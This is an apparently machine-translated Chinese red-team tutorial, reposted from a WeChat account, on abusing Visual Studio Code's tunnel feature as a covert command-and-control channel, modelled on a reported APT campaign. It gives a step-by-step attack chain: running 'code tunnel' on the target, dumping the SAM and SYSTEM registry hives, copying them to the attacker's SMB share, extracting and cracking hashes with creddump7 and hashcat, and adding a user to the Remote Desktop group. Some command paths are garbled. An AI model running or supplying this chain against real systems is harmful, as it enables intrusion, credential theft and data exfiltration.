今天我们来看看如何使用 VScode 的二进制文件和 devtunnels 的 Visual Studio Code (如 Command&Control)。我分享本文的目的仅用于教育目的。
该威胁行为者是高级持续威胁 (APT) 组织之一,该组织执行中国使用的网络间谍攻击。你可以在这篇文章中阅读它。
中国 APT 滥用 VSCode 以亚洲政府为目标
我们遥测的第一次:中国 APT Stately Taurus 使用 Visual Studio Code 在受害者的...
unit42.paloaltonetworks.com
该威胁行为者使用 Visual Studio Code 的嵌入式反向 shell 功能在目标网络中站稳脚跟。这是一位安全研究人员在 2023 年发现的一项相对较新的技术。但是这种攻击是如何运作的呢?
要滥用 Visual Studio Code 用于恶意目的,攻击者可以使用 code.exe 的可移植版本(Visual Studio Code 的可执行文件)或已安装的软件版本。通过运行 code.exe tunnel 命令,攻击者会收到一个链接,要求他们使用自己的帐户登录 GitHub。
在 Visual Studio Code 的文档中,VScode 用户可以使用 Remote — Tunnels 扩展允许您通过安全隧道连接到远程计算机,例如台式 PC 或虚拟机 (VM)。您可以在任何位置从 VS Code 客户端连接到该计算机,而无需 SSH。
那么我们这里有什么呢?VSCode 能够建立与远程系统的连接。使用官方Microsoft域 https://vscode.dev. 而不会被防病毒软件捕获。
作为概念验证 (POC),我将在虚拟 Windows 10 pro 机器上演示这种攻击技术以展示其工作原理。现在让我们开始吧。
首先,我们需要确保 Target 系统具有二进制文件,大多数用户在他们的操作系统上安装了 VSCode,但您可以使用不同的攻击媒介远程安装,为此您可以查看 PfiatDe 制作的这篇文章。但我已经在我的 VM 上安装了 VSCode。code.exe
现在我们需要在真实情况下运行 tunnel parametr,你需要将 Reverse shell 获取到系统,以便演示我使用 SSH 登录到系统。如果你不想要那个,请查看我的另一篇文章 如何后门 Windows 桌面快捷方式.code.exe
┌──(root㉿Ghost0xFF)-[/home/kali/]└─# ssh 'Username'@'TargetIP'
现在是时候使用 tunnel parametr connect 官方Microsoft域了 https://vscode.dev. 通信本身将通过 WebSockets https://global.rel.tunnels.api.visualstudio.com。code.exe
#Command Run VScode tunnel fuctionC:UsersPhantom> code tunnel
当您运行此代码时,您将看到一个 Github 登录链接和一个代码,打开 Github 登录链接,输入您的 Github 帐户和给定的代码。
注意:要使用此 Attack vecktor,您需要一个 Github 帐户。
登录帐户后,激活设备并输入给定的代码。
现在授权 VScode 在您的 Web 浏览器中激活一个 Websocket。
现在看看终端,它会给你一个另一个链接,打开链接后,它会在你的浏览器中将 Visual Studio Code 作为 WEB 应用程序运行。
选择应用程序后,您将收到一条消息,询问您是否允许使用远程隧道扩展来连接目标虚拟机。
然后 Repeat the Authentication proc Again in Web application(在 Web 应用程序中再次重复身份验证过程)。
完成身份验证过程,再次检查终端,您将看到在目标 Windows 系统上创建了会话
它要求另一个 Authorization to Trust this Publisher go 并允许它。
瞧。我们通过 VSCode 成功获得了对目标的所有文件系统的访问权限。
你可以做任何你想做的事,这就是这个威胁演员所做的一切。但要让它更有趣! 我将获取系统用户的密码并通过 RDP 进行连接。我们可以访问终端的 VSCode 最好的部分之一。
现在我们知道我们可以使用终端来获取 SAM 和 SYSTEM 注册表文件,它们是 Windows 系统将其用户凭证哈希存储在此注册表文件中。为此,首先我将在二进制文件的帮助下将此文件的内容保存到不同的文件中。reg.exe
#Save SAM as File named samPS C:> reg.exe save HKLMSAM sam#Save SYSTEM as File named systemPS C:> reg.exe save HKLMSYSTEM system
将此文件传输到我的本地系统,我将在我的 Kali 机器上使用 Impacket 的 SMB 服务器。
┌──(root㉿Ghost0xFF)-[/home/kali/Desktop]└─# impacket-smbserver 'smbfolder' 'Folder-location'
注意:
要将文件传输到我们的本地计算机,请使用以下命令。
#Command transfer SAM file to kali smbfolderPS C:> copy sam \'Local-IP''Smbfolder'#Command transfer SYSTEM file to kali smbfolderPS C:> copy system \'Local-IP''Smbfolder'
现在是从此文件中提取哈希值的时候了,为此我使用 Creddump7 工具,您可以在此存储库中获取它
GitHub - Tib3rius/creddump7
通过在 GitHub 上创建帐户,为 Tib3rius/creddump7 开发做出贡献。
github.com
┌──(root㉿Ghost0xFF)-[/opt/Hack-tool]└─# git clone https://github.com/Tib3rius/creddump7
将 SAM 和 SYSTEM 文件移动到 tool repo 文件夹中,并使用 pwndump.py 提取用户的哈希值。
┌──(root㉿Ghost0xFF)-[/opt/Hack-tool/creddump7]└─# python3 pwdump.py system sam
提取用户哈希值后,我们需要破解哈希值,我使用 Hashcat 工具,但您可以使用不同的替代方案。
┌──(root㉿Ghost0xFF)-[/opt/Hack-tool/creddump7]└─# hashcat -m 1000 --force 'User-hash' /usr/share/wordlists/rockyou.txt
这需要一些时间,但现在,我们有了系统用户的密码。
在我们连接到 RDP 之前,我们需要将我们的用户添加到远程桌面用户组,为此在 Powershell 上编写此命令。
PS C:> Add-LocalGroupMember -Group "Remote Desktop Users" -Member "Phantom"
现在使用 RDP 连接,我使用 xfreerdp 工具,但您可以使用替代工具。
就是这样,现在我们通过 RDP 作为系统用户进入系统。
原文始发于微信公众号(安全狗的自我修养):像 C2 一样使用 VSCode - 红队风格
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论